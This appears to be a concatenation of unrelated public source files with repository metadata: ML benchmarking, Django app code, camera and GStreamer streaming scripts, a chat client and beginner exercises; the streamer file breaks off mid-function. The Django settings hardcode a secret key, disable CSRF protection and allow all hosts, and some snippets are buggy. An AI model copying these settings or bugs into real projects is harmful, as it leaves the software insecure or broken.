df.drop(['summonerName'], 1, inplace=True)
df.fillna(0, inplace=True)
testdf = df[400000:]
df = df[:400000]
X_test = np.array(testdf.drop(['win'], 1))
y_test = np.array(testdf['win'])
testValues = [100, 500, 1000, 2500, 5000, 7500, 10000, 15000, 20000, 40000, 80000, 100000, 150000, 200000, 300000, 400000]
accuracyList = []
timeList = []
time2List = []
for i in testValues:
tempdf = df[:i]
model, accuracy, runTime, runTime2 = assess(tempdf, X_test, y_test)
accuracyList.append(accuracy)
timeList.append(runTime)
time2List.append(runTime2)
print(f"Finished size: {i}")
fig, ax = plt.subplots(1,3)
ax0 = ax[0]
ax1 = ax[1]
ax2 = ax[2]
ax0.plot(testValues, accuracyList)
ax1.plot(testValues, timeList)
ax2.plot(testValues, time2List)
ax2.set_title("Second RunTime against testing")
ax0.set_yticks(np.arange(0,1.1,0.1))
ax0.set_title("kNN Accuracy w.r.t. data size")
ax0.set_xscale("log")
ax0.set_xlabel("Training Data Size")
ax0.set_ylabel("Accuracy Against Test Set")
ax0.grid()
ax1.set_title("RunTime")
plt.show()
print(testValues)
print(accuracyList)
print(timeList)
print(time2List)
resultDict = [testValues, accuracyList, timeList, time2List]
with open('ResultKNN.txt', 'wb') as f:
pickle.dump(resultDict,f)
if __name__=="__main__":
singleRunKNN()
kNNGraphRun() | [
"[email protected]"
] | |
24e8923ad779dc2cb7b8fd60ffb503312ae4b452 | db259ea23fabb6bdddfc26ad6d3c8fd852d6a9fc | /python/case_test.py | 19e755496002be90aee41ca9c49e5b57c53883ef | [] | no_license | bizzcat/codeguild | f5333996d80d1bb81373746f3368df5c72c9558d | 08d87d55107466dca8c6d7e80a2bd61ecbb95a7c | refs/heads/master | 2020-12-25T16:54:03.717775 | 2016-08-10T17:04:17 | 2016-08-10T17:04:17 | 55,080,415 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,039 | py | # Create a test module for your case change program
# import your case change program
# create a test case class
# write a test for your snake case to camel case functions
# run the test via PyCharms testing run config
#
# * test your other transformations in the case change
# * test one of the tic tac toe board classes
# *duplicate those tests for the other board classes
#~~~~~~~~~~~~~~~~
import unittest
import encapsulation
class TestEncapsulation(unittest.TestCase):
def test_list_board_place(self):
board1 = encapsulation.ListListTTTBoard()
board1.place(0, 2, 'F')
assert board1.rows[2][0] == 'F'
TestCaseConversion.test_list_board_place(unittest.TestCase)
import case_conversion
class TestCaseConversion(unittest.TestCase):
def test_word_to_title(self):
word = 'this is my word'
expected = 'This Is My Word'
assert case_conversion.word_to_title(word) == expected
TestCaseConversion.test_word_to_title(unittest.TestCase)
#
| [
"[email protected]"
] | |
811fd686f5129b674ddd6d46c77719477b3fb263 | b2eb8af13e5532fc5c613bbd68af97fa5938b758 | /beginner level/count digits.py | 084171349b4c07bb3c473b3a1c85a5dcdc51e228 | [] | no_license | rahasudha2910/python-programming | 81964ffd61c6a814e22543a9315b05eca028fd59 | f3cfbb9a3d368cd17fbd59c6ce4affa83fe36585 | refs/heads/master | 2021-04-06T00:24:45.160387 | 2018-05-03T06:16:38 | 2018-05-03T06:16:38 | 125,213,347 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 110 | py | count=0
number=int(input())
while(number>0):
number=number/10
count=count+1
print("numer of digits:",count)
| [
"[email protected]"
] | |
c2835b1f8a3632284eca779d2dc1f17bfaf30295 | 6d501ea43b1a52bf4af44ae5677eba8b928ffec3 | /directory/signals.py | e1d22e0a309d7321f2db634715374ef5fabc6e4f | [] | no_license | mozilla/hive-django | 78d5e7bf687e2311a41d2b6d555b9671c4270b4d | bf95dce0af0148ecacde2256d235788fd79c7d5e | refs/heads/master | 2023-08-27T12:47:36.977377 | 2016-05-04T21:12:47 | 2016-05-04T21:12:47 | 55,106,672 | 0 | 2 | null | 2016-05-04T21:12:47 | 2016-03-31T00:12:58 | Python | UTF-8 | Python | false | false | 1,684 | py | from django.dispatch import receiver
from django.contrib.sites.models import Site
from django.db.models.signals import post_save
from django.contrib.auth.signals import user_logged_in
from django.contrib import messages
from registration.signals import user_activated
from .models import City, User, Organization, Membership, is_user_vouched_for
@receiver(post_save, sender=City)
def clear_site_cache_when_city_changes(**kwargs):
# It's possible that the site may be associated with a different
# city now, so clear the site cache.
Site.objects.clear_cache()
@receiver(post_save, sender=User)
def create_membership_for_user(sender, raw, instance, **kwargs):
if raw: return
if not len(Membership.objects.filter(user=instance)):
membership = Membership(user=instance)
membership.save()
@receiver(user_activated)
def auto_register_user_with_organization(sender, user, request, **kwargs):
if user.membership.organization: return
orgs = Organization.objects.possible_affiliations_for(user)
if orgs.count() != 1: return
org = orgs[0]
user.membership.organization = org
user.membership.save()
@receiver(user_logged_in)
def tell_user_to_update_their_profile(sender, user, request, **kwargs):
if not is_user_vouched_for(user): return
if not user.membership.bio:
messages.info(request,
'You don\'t have a bio! You should write one '
'so community members can learn more about you. '
'Just visit your user profile by accessing the '
'user menu at the top-right corner of this page.',
fail_silently=True)
| [
"[email protected]"
] | |
f264cbe12ec190255d0fe7fb1219395eaff22bc8 | 743c3b0cd875fe294fc15b96de678c93ecd8ab27 | /foruser/myuser/urls.py | 838fc3a9e5c5fdfd03f5f634b2ec6fe3d8967638 | [] | no_license | yudian03/LOGIN | f3cc760ee25a34ce7b939de5475fc7f7097b59a3 | 3db6278bc15be6244187d9744f3bdf562c7d409f | refs/heads/master | 2020-05-01T04:30:17.146513 | 2019-03-23T10:51:11 | 2019-03-23T10:51:11 | 177,276,374 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | from django.urls import path
from . import views
urlpatterns = [
path('register/',views.register),
path('login/',views.login),
path('home/',views.home),
path('logout/',views.logout)
] | [
"[email protected]"
] | |
79ed0714d0c43d90dfdd81ec91c54c3b87f9b879 | dbf65af61e62e9617d2bbc35fba625e005aed863 | /ir-wuggy/dtw/plot/plot-dtw-profile.py | a99b386410fe9fae83ad6fbbda046e4a8bda24f5 | [] | no_license | chorowski-lab/zs2021 | bef261073d8a26bee62576ccf107e163ecf9fe89 | bbcb97903aeeed861376a336a8af8f74a0d03ded | refs/heads/main | 2023-06-19T01:01:51.904899 | 2021-04-08T19:52:34 | 2021-04-08T19:52:34 | 345,989,211 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,993 | py | # %%
import numpy as np
import os
import pathlib
import argparse
import pickle
import yaml
import pandas
import matplotlib.pyplot as plt
# %%
parser = argparse.ArgumentParser(description='Compute the pseudo log-proba of a list of sentences')
parser.add_argument('config', type=str, help='Location of the .yaml config file')
parser.add_argument('--gold', type=pathlib.Path, default=pathlib.Path('/pio/data/zerospeech2021/dataset/lexical/dev/gold.csv'),
help='Location of the gold.csv file')
args = parser.parse_args()
# %%
class Args:
config = pathlib.Path('/pio/scratch/1/i290956/zs2021/lexical/configurations/train-960/train-960-dtw-dm-ext.yaml')
gold = pathlib.Path('/pio/data/zerospeech2021/dataset/lexical/dev/gold.csv')
q = 500
args = Args()
# %%
with open(args.config) as config_file:
config = yaml.full_load(config_file)
class Dataset:
def __init__(self, path):
self.data = []
self.filenames = []
self.filename_to_id = dict()
self.n = 0
for line in open(path, 'r', encoding='utf8'):
fname, sdesc = line.strip().split()
self.filenames.append(fname)
self.filename_to_id[fname] = self.n
d = list(map(int, sdesc.split(',')))
self.data.append(np.array(d, dtype='int32'))
self.n += 1
self.filenames = np.array(self.filenames)
self.maxlength = max(len(sample) for sample in self.data)
def __getitem__(self, i):
return self.filenames[i], self.data[i]
def __len__(self):
return self.n
def get(self, fname):
return self.data[self.filename_to_id[fname]]
class Results:
def __init__(self, path):
self.filename_to_id = dict()
self.n = 0
self.filenames = []
self.costs = []
ids = [int(fname.split('-')[1]) for fname in os.listdir(path) if fname.startswith('dev-')]
n = max(ids)
if len(set(range(1, n+1)) - set(ids)) > 0:
raise ValueError(f'some dev-i files are missing')
for i in range(1, n+1):
for line in open(path / f'dev-{i}', 'r'):
fname, costs, Fnames = line.strip().split()
costs = list(map(float, costs[1:-1].split(',')))
Fnames = list(map(lambda x: x[1:-1], Fnames[1:-1].split(',')))
self.costs.append(costs)
self.filenames.append(Fnames)
self.filename_to_id[fname] = self.n
self.n += 1
def get(self, fname):
return self.costs[self.filename_to_id[fname]], self.filenames[self.filename_to_id[fname]]
def dtw_ext(s, t, d):
n, m = len(t), len(s)
DTW = np.ones((2, m)) * 100000
costpath = np.zeros((2, m, n))
started = np.vstack((np.arange(m), np.zeros(m, dtype='int32')))
DTW[0, :] = 0
q = 1
for i in range(n):
cost = s[0] != t[i] if d is None else d[s[0], t[i]]
DTW[q, 0] = DTW[1-q,0] + cost
if i > 0:
costpath[q, 0, :i] = costpath[1-q,0,:i]
costpath[q, 0, i] = cost
started[1-q,0] = started[q,0]
for j in range(1, m):
cost = s[j] != t[i] if d is None else d[s[j], t[i]]
costpath[q, j, i] = cost
if DTW[1-q,j-1] <= DTW[1-q, j] and DTW[1-q,j-1] <= DTW[q, j-1]:
DTW[q,j] = cost + DTW[1-q,j-1]
costpath[q, j, :i] = costpath[1-q,j-1,:i]
started[q,j] = started[1-q,j-1]
elif DTW[1-q,j] <= DTW[1-q, j-1] and DTW[1-q,j] <= DTW[q,j-1]:
DTW[q,j] = cost + DTW[1-q,j]
costpath[q, j, :i] = costpath[1-q,j,:i]
started[q,j] = started[1-q,j]
else:
DTW[q,j] = cost + DTW[q,j-1]
costpath[q, j, :i] = costpath[q,j-1,:i]
started[q,j] = started[q,j-1]
q = 1 - q
bi = np.argmin(DTW[1-q,:])
return DTW[1-q,bi], costpath[1-q,bi,:], started[1-q,bi], bi
def load_entropy():
return pickle.load(open('/pio/scratch/2/mstyp/wav2vec/experiments/zerospeech_lm/lstm_3l_qt/entropy/12/entropy', 'rb'))
# %%
trainPath = pathlib.Path(config["trainFile"]) if "trainFile" in config else pathlib.Path(config["trainPath"]) / 'quantized_outputs.txt'
testPath = pathlib.Path(config["testFile"]) if "testFile" in config else pathlib.Path(config["testPath"]) / 'quantized_outputs.txt'
outPath = pathlib.Path(config['outPath']).parents[0]
trainset = Dataset(trainPath)
testset = Dataset(testPath)
results = Results(outPath)
gold = pandas.read_csv(args.gold, header=0).astype({'frequency': pandas.Int64Dtype()})
distMatrix = np.load(config['method']['distMatrix'], allow_pickle=True)
entropy = load_entropy()
# %%
distMatrix = np.load('/pio/scratch/1/i290956/zs2021/lexical/dm/distMatrix1.npy')
def gen_profile(fname, offset):
testsample = testset.get(fname)
costs, Fnames = results.get(fname)
trainsample = trainset.get(Fnames[0])
c, p, a, b = dtw_ext(trainsample, testsample, distMatrix)
ent = entropy[Fnames[0]]
# return ent[a-offset:b+1+offset], offset - max(offset-a, 0), b+1-a
return p
w_colors = ['#00600f', '#6abf69', '#005b9f', '#5eb8ff']
nw_colors = ['#9a0007', '#ff6659', '#bb4d00', '#ffad42']
def generate_plots(id):
samples = gold[gold['id'] == id]
words = samples[samples['correct'] == 1]['filename'].to_numpy()
nonwords = samples[samples['correct'] == 0]['filename'].to_numpy()
offset = 50
words_profiles = [gen_profile(fname, offset) for fname in words]
nonwords_profiles = [gen_profile(fname, offset) for fname in nonwords]
plt.figure(figsize=(16,9))
plt.plot(np.arange(len(words_profiles[0])), words_profiles[0], color=w_colors[0])
plt.plot(np.arange(len(nonwords_profiles[0])), nonwords_profiles[0], color=nw_colors[0])
# plt.axvspan(off, off+lgh, facecolor='0.2', alpha=0.3)
plt.xlabel('Time')
plt.ylabel('Cost')
plt.plot()
# plt.close()
generate_plots(5)
# %%
| [
"[email protected]"
] | |
1b1ab3e24221ed687e2f7b52f6c610a97ea72193 | 2a4aced6789a09b64caead20fd231ed104f4583b | /capture/ximea-usb3/python/openCV/example_openCV_video.py | d5ce3a8d0bd1f3d22183a1ff0102b73f72fcc20d | [
"MIT"
] | permissive | ruedijc/jetson-cam-utils | 8dd2a8fa48b390b940b938c9a0519df5599ef63d | 29fb26892cc150f9679ad7d5c3220e38f733ab04 | refs/heads/main | 2023-04-27T12:22:09.079527 | 2021-05-06T16:54:33 | 2021-05-06T16:54:33 | 329,092,484 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,300 | py | from ximea import xiapi
import cv2
import time
#create instance for first connected camera
cam = xiapi.Camera()
#start communication
print('Opening first camera...')
cam.open_device()
#settings
cam.set_exposure(20000)
#create instance of Image to store image data and metadata
img = xiapi.Image()
#start data acquisition
print('Starting data acquisition...')
cam.start_acquisition()
try:
print('Starting video. Press CTRL+C to exit.')
t0 = time.time()
while True:
#get data and pass them from camera to img
cam.get_image(img)
#create numpy array with data from camera. Dimensions of the array are
#determined by imgdataformat
data = img.get_image_data_numpy()
#show acquired image with time since the beginning of acquisition
font = cv2.FONT_HERSHEY_SIMPLEX
text = '{:5.2f}'.format(time.time()-t0)
cv2.putText(
data, text, (900,150), font, 4, (255, 255, 255), 2
)
cv2.imshow('XiCAM example', data)
cv2.waitKey(1)
except KeyboardInterrupt:
cv2.destroyAllWindows()
#stop data acquisition
print('Stopping acquisition...')
cam.stop_acquisition()
#stop communication
cam.close_device()
print('Done.')
| [
"[email protected]"
] | |
a955aa2adcf7d72b65e3af9165bf022c5a057ec0 | 9d29b302cca89a4ad816f99f1d3c708862dd4c0b | /client.py | 73c58c8f77fdac730b4bde122ffd76801a4ac751 | [] | no_license | Manoj-M-97/Flight-Booking-System | a28c57c770ea06cc4c8704dbddc2740ec3d86fcd | 649d74c63d73a24a3fd97406008903f806ffa34b | refs/heads/master | 2020-03-22T04:02:38.788029 | 2018-07-02T16:48:21 | 2018-07-02T16:48:21 | 139,468,945 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,361 | py | # Python program to implement client side of chat room.
import socket
import select
import sys
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if len(sys.argv) != 3:
print "Correct usage: script, IP address, port number"
exit()
IP_address = str(sys.argv[1])
Port = int(sys.argv[2])
server.connect((IP_address, Port))
cl="CLOSE"
while True:
# maintains a list of possible input streams
sockets_list = [sys.stdin, server]
""" There are two possible input situations. Either the
user wants to give manual input to send to other people,
or the server is sending a message to be printed on the
screen. Select returns from sockets_list, the stream that
is reader for input. So for example, if the server wants
to send a message, then the if condition will hold true
below.If the user wants to send a message, the else
condition will evaluate as true"""
read_sockets,write_socket, error_socket = select.select(sockets_list,[],[])
for socks in read_sockets:
if socks == server:
message = socks.recv(2048)
if (message.endswith(cl)):
print "Connection Terminated"
exit()
print message
else:
message = sys.stdin.readline()
server.send(message)
sys.stdout.flush()
server.close()
| [
"[email protected]"
] | |
c3b2ccf3279e3d6c131b50d1a8a089fc8ee00b32 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/domain/BizListDataInfo.py | 5f874dfae528b4b6592ad1306c025ec59eb0239e | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 1,206 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class BizListDataInfo(object):
def __init__(self):
self._code = None
self._name = None
@property
def code(self):
return self._code
@code.setter
def code(self, value):
self._code = value
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
def to_alipay_dict(self):
params = dict()
if self.code:
if hasattr(self.code, 'to_alipay_dict'):
params['code'] = self.code.to_alipay_dict()
else:
params['code'] = self.code
if self.name:
if hasattr(self.name, 'to_alipay_dict'):
params['name'] = self.name.to_alipay_dict()
else:
params['name'] = self.name
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = BizListDataInfo()
if 'code' in d:
o.code = d['code']
if 'name' in d:
o.name = d['name']
return o
| [
"[email protected]"
] | |
127f14137ff8c69323cb99a5ec67d900927cca5e | 4b17225bc3860419edb6a8818bbac82e6b36e79d | /employee_tracker/settings.py | ce1b5d600785fc29625c723fdb419d1d986f35e8 | [] | no_license | argon2008-aiti/employee_tracker | 8ab45ee727e07b242d6ac3fb446ca5c1b9649bb0 | 5be7c3bb323f3b350d26df4d4813b6b071324277 | refs/heads/master | 2021-01-15T13:00:03.644233 | 2016-10-06T16:42:28 | 2016-10-06T16:42:28 | 35,000,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,444 | py | """
Django settings for employee_tracker project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'cdkxms9u50qs@ig3j3s771u55ntlvxp2h8pijlx2rr83ms)#7q'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = [".herokuapp.com"]
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'south',
'monitor',
'leaflet',
'djgeojson',
'django_ajax',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
#'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'employee_tracker.urls'
WSGI_APPLICATION = 'employee_tracker.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# for graphviz
GRAPH_MODELS = {
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
# static file directories
STATICFILES_DIRS = (
('assets', 'static'),
)
# base url at which static files are served
STATIC_URL = '/assets/'
STATIC_ROOT = os.path.join(BASE_DIR,'assets')
LOGIN_URL = '/login'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
)
# Template files (html+django templates)
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, "templates"),
)
# Production code
if DEBUG==False:
#parse database configuration from $DATABASE_URL
import dj_database_url
DATABASES['default'] = dj_database_url.config()
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Allow all host headers
ALLOWED_HOSTS = ['*']
# Static asset configuration
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT = 'staticfiles'
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
| [
"[email protected]"
] | |
9b104ec52e6584f2efd846c1fb6016f0c5fbebfd | f3a714a064b12ce957f496c97200d5b0c31f631e | /remove_current.py | de3697d60276efd9f98f89abb276c2b081da2181 | [] | no_license | krachbumm3nte/playlistAdder | af06d6d0de731f42cb68cf5acf7d29a809d13578 | 7caac884101b59354a0aa2928b9f8089a3c0cdb9 | refs/heads/master | 2020-05-04T01:32:07.552438 | 2019-11-30T18:09:52 | 2019-11-30T18:09:52 | 178,907,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 802 | py | from functools import partial
import config
from adder_utils import *
def removetool(master, list_id, list_name, song_id, spotipy_instance):
removefunc = partial(remove_song_from, song_id, list_id, spotipy_instance, list_name)
query, query_label = continue_query(querytext=f"remove this song from {list_name}?", master=master,
cancel_func=sys.exit, continue_func=removefunc)
query.pack()
query.focus_set()
def remove_song_from(song_id, list_id, spotipy_instance, list_name, event=None):
spotipy_instance.user_playlist_remove_all_occurrences_of_tracks(user=config.user,
playlist_id=list_id, tracks=[song_id])
print(f'removed song from {list_name}')
sys.exit()
| [
"johannes.gmx.de"
] | johannes.gmx.de |
98616241fbdcb931bae105f55cdfe34251a2d974 | 26408f11b938a00f8b97a3e195095a45a12dc2c7 | /sneeze/Player.py | e1aecbdfcc7127f7257b5d20b68035b164acb822 | [] | no_license | cz-fish/sneeze-dodger | a7ea25e9267d408e8f46a9fb7a988d52dca8bd8e | 4fd333345d1f7d82c92ddcb15f18077362766844 | refs/heads/master | 2022-07-07T01:39:06.162125 | 2020-05-18T08:01:57 | 2020-05-18T08:01:57 | 255,090,774 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 849 | py | from sneeze.Actor import Actor
from sneeze.Sprite import Sprite
from sneeze.Types import *
class Player(Actor):
def __init__(self):
super().__init__()
self.sprite = Sprite.load('guy')
def move(self, inputs: Inputs, collision) -> None:
self.update_speed(inputs.xvalue, inputs.yvalue)
new_pos = collision(self.pos, self.speed_vec)
if new_pos == self.pos:
self.speed_vec = Pos(0, 0)
self.move_to(new_pos)
# walk phase; reset if not moving
if abs(self.speed_vec.x) < 2 and abs(self.speed_vec.y) < 2:
self.animation = Animation('idle', 0)
else:
key, phase = self.animation
if key == 'walk':
self.animation = Animation(key, phase + 1)
else:
self.animation = Animation('walk', 0)
| [
"[email protected]"
] | |
0de2dcdd25e4cabb3723ac7cb45dbf917637dc3b | 909b93b8df2a79a2ba7567587604d764a34281fc | /bot/app_streamer.py | 9f885eb613ee7ad8498df4d050264a4778119448 | [] | no_license | ArtemZaZ/PultBot | f321282534c02789ac5b868844da15fe4614b9ac | d23b867eb7eda78b006fa32f503148da2a4d6d7f | refs/heads/master | 2020-03-07T05:52:29.748385 | 2019-12-06T12:23:14 | 2019-12-06T12:23:14 | 127,307,917 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,613 | py | import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst
import sys
import threading
import logging
import numpy as np
from bot.common import *
HOST = '127.0.0.1'
RTP_PORT = 5000
class AppSrcStreamer(object):
def __init__(self, video=VIDEO_MJPEG, resolution=(640, 480), framerate=30,
onFrameCallback=None, useOMX=False, scale=1):
self._host = HOST
self._port = RTP_PORT
self._width = resolution[0]
self._height = resolution[1]
self._scaleWidth = int(self._width * scale)
self._scaleHeight = int(self._height * scale)
self._needFrame = threading.Event() # флаг, необходимо сформировать OpenCV кадр
self.playing = False
self.paused = False
self._onFrameCallback = None
if video != VIDEO_RAW:
if (not onFrameCallback is None) and callable(onFrameCallback):
self._onFrameCallback = onFrameCallback # обработчик события OpenCV кадр готов
# инициализация Gstreamer
Gst.init(None)
# создаем pipeline
self._make_pipeline(video, self._width, self._height, framerate, useOMX, scale)
self.bus = self.pipeline.get_bus()
self.bus.add_signal_watch()
self.bus.connect('message', self._onMessage)
self.ready_pipeline()
def _make_pipeline(self, video, width, height, framerate, useOMX, scale):
# Создание GStreamer pipeline
self.pipeline = Gst.Pipeline()
self.rtpbin = Gst.ElementFactory.make('rtpbin')
self.rtpbin.set_property('latency', 200)
self.rtpbin.set_property('drop-on-latency', True) # отбрасывать устаревшие кадры
self.rtpbin.set_property('buffer-mode', 4)
self.rtpbin.set_property('ntp-time-source', 3) # источник времени clock-time
self.rtpbin.set_property('ntp-sync', True)
self.rtpbin.set_property('rtcp-sync-send-time', False)
# настраиваем appsrc
self.appsrc = Gst.ElementFactory.make('appsrc')
self.appsrc.set_property('is-live', True)
if video == VIDEO_H264:
videoStr = 'video/x-h264'
elif video == VIDEO_MJPEG:
videoStr = 'image/jpeg'
elif video == VIDEO_RAW:
videoStr = 'video/x-raw,format=RGB'
capstring = videoStr + ',width=' + str(width) \
+ ',height=' + str(height) + ',framerate=' \
+ str(framerate) + '/1'
srccaps = Gst.Caps.from_string(capstring)
self.appsrc.set_property('caps', srccaps)
# print('RPi camera GST caps: %s' % capstring)
if video == VIDEO_RAW:
self.videoconvertRAW = Gst.ElementFactory.make('videoconvert')
self.videoconvertRAWFilter = Gst.ElementFactory.make('capsfilter', 'videoconvertfilter')
videoconvertCaps = Gst.caps_from_string(
'video/x-raw,format=I420') # формат данных для преобразования в JPEG
self.videoconvertRAWFilter.set_property('caps', videoconvertCaps)
self.jpegenc = Gst.ElementFactory.make('jpegenc')
# self.jpegenc = Gst.ElementFactory.make('vaapijpegenc')
# self.jpegenc = Gst.ElementFactory.make('avenc_ljpeg')
# jpegencCaps = Gst.Caps.from_string('video/x-raw,format=I420')
# self.jpegenc.set_property('caps', jpegencCaps)
if video == VIDEO_H264:
parserName = 'h264parse'
else:
parserName = 'jpegparse'
self.parser = Gst.ElementFactory.make(parserName)
if video == VIDEO_H264:
payloaderName = 'rtph264pay'
# rtph264pay.set_property('config-interval', 10)
# payloadType = 96
else:
payloaderName = 'rtpjpegpay'
# payloadType = 26
self.payloader = Gst.ElementFactory.make(payloaderName)
# payloader.set_property('pt', payloadType)
# For RTP Video
self.udpsink_rtpout = Gst.ElementFactory.make('udpsink', 'udpsink_rtpout')
# self.udpsink_rtpout.set_property('host', self._host)
# self.udpsink_rtpout.set_property('port', self._port)
self.udpsink_rtpout.set_property('sync', False)
self.udpsink_rtpout.set_property('async', False)
self.udpsink_rtcpout = Gst.ElementFactory.make('udpsink', 'udpsink_rtcpout')
# self.udpsink_rtcpout.set_property('host', self._host)
# self.udpsink_rtcpout.set_property('port', self._port + 1)
self.udpsink_rtcpout.set_property('sync', False)
self.udpsink_rtcpout.set_property('async', False)
self.udpsrc_rtcpin = Gst.ElementFactory.make('udpsrc', 'udpsrc_rtcpin')
srcCaps = Gst.Caps.from_string('application/x-rtcp')
# self.udpsrc_rtcpin.set_property('port', self._port + 5)
self.udpsrc_rtcpin.set_property('caps', srcCaps)
# Задаем IP адресс и порт
self.setHost(self._host)
self.setPort(self._port)
if not self._onFrameCallback is None:
self.tee = Gst.ElementFactory.make('tee')
self.rtpQueue = Gst.ElementFactory.make('queue', 'rtp_queue')
self.frameQueue = Gst.ElementFactory.make('queue', 'frame_queue')
if video == VIDEO_H264:
if useOMX:
decoderName = 'omxh264dec' # отлично работает загрузка ЦП 200%
else:
decoderName = 'avdec_h264' # хреново работает загрузка ЦП 120%
# decoder = Gst.ElementFactory.make('avdec_h264_mmal') #не заработал
else:
if useOMX:
decoderName = 'omxmjpegdec' #
else:
decoderName = 'avdec_mjpeg' #
# decoder = Gst.ElementFactory.make('jpegdec') #
self.decoder = Gst.ElementFactory.make(decoderName)
self.videoconvert = Gst.ElementFactory.make('videoconvert')
if scale != 1:
self.videoscale = Gst.ElementFactory.make('videoscale')
self.videoscaleFilter = Gst.ElementFactory.make('capsfilter', 'scalefilter')
videoscaleCaps = Gst.caps_from_string('video/x-raw, width=%d, height=%d' % (
self._scaleWidth, self._scaleHeight)) # формат данных после изменения размера
self.videoscaleFilter.set_property('caps', videoscaleCaps)
### создаем свой sink для перевода из GST в CV
self.appsink = Gst.ElementFactory.make('appsink')
cvCaps = Gst.caps_from_string('video/x-raw, format=RGB') # формат принимаемых данных
self.appsink.set_property('caps', cvCaps)
self.appsink.set_property('sync', False)
# appsink.set_property('async', False)
self.appsink.set_property('drop', True)
self.appsink.set_property('max-buffers', 5)
self.appsink.set_property('emit-signals', True)
self.appsink.connect('new-sample', self._newSample)
# добавляем все элементы в pipeline
elemList = [self.appsrc, self.rtpbin, self.parser, self.payloader, self.udpsink_rtpout,
self.udpsink_rtcpout, self.udpsrc_rtcpin]
if video == VIDEO_RAW:
elemList.extend([self.videoconvertRAW, self.videoconvertRAWFilter, self.jpegenc])
if not self._onFrameCallback is None:
elemList.extend([self.tee, self.rtpQueue, self.frameQueue, self.decoder, self.videoconvert, self.appsink])
if scale != 1:
elemList.extend([self.videoscale, self.videoscaleFilter])
for elem in elemList:
if elem is None:
logging.critical('GST elements could not be null')
sys.exit(1)
self.pipeline.add(elem)
# соединяем элементы
if video == VIDEO_RAW:
ret = self.appsrc.link(self.videoconvertRAW)
ret = ret and self.videoconvertRAW.link(self.videoconvertRAWFilter)
ret = ret and self.videoconvertRAWFilter.link(self.jpegenc)
ret = ret and self.jpegenc.link(self.parser)
else:
ret = self.appsrc.link(self.parser)
# соединяем элементы rtpbin
ret = ret and self.payloader.link_pads('src', self.rtpbin, 'send_rtp_sink_0')
ret = ret and self.rtpbin.link_pads('send_rtp_src_0', self.udpsink_rtpout, 'sink')
ret = ret and self.rtpbin.link_pads('send_rtcp_src_0', self.udpsink_rtcpout, 'sink')
ret = ret and self.udpsrc_rtcpin.link_pads('src', self.rtpbin, 'recv_rtcp_sink_0')
if self._onFrameCallback is None: # трансляция без onFrameCallback, т.е. создаем одну ветку
ret = ret and self.parser.link(self.payloader)
else: # трансляция с передачей кадров в onFrameCallback, создаем две ветки
ret = ret and self.parser.link(self.tee)
# 1-я ветка RTP
ret = ret and self.rtpQueue.link(self.payloader)
# 2-я ветка onFrame
ret = ret and self.frameQueue.link(self.decoder)
if scale != 1:
ret = ret and self.decoder.link(self.videoscale)
ret = ret and self.videoscale.link(self.videoscaleFilter)
ret = ret and self.videoscaleFilter.link(self.videoconvert)
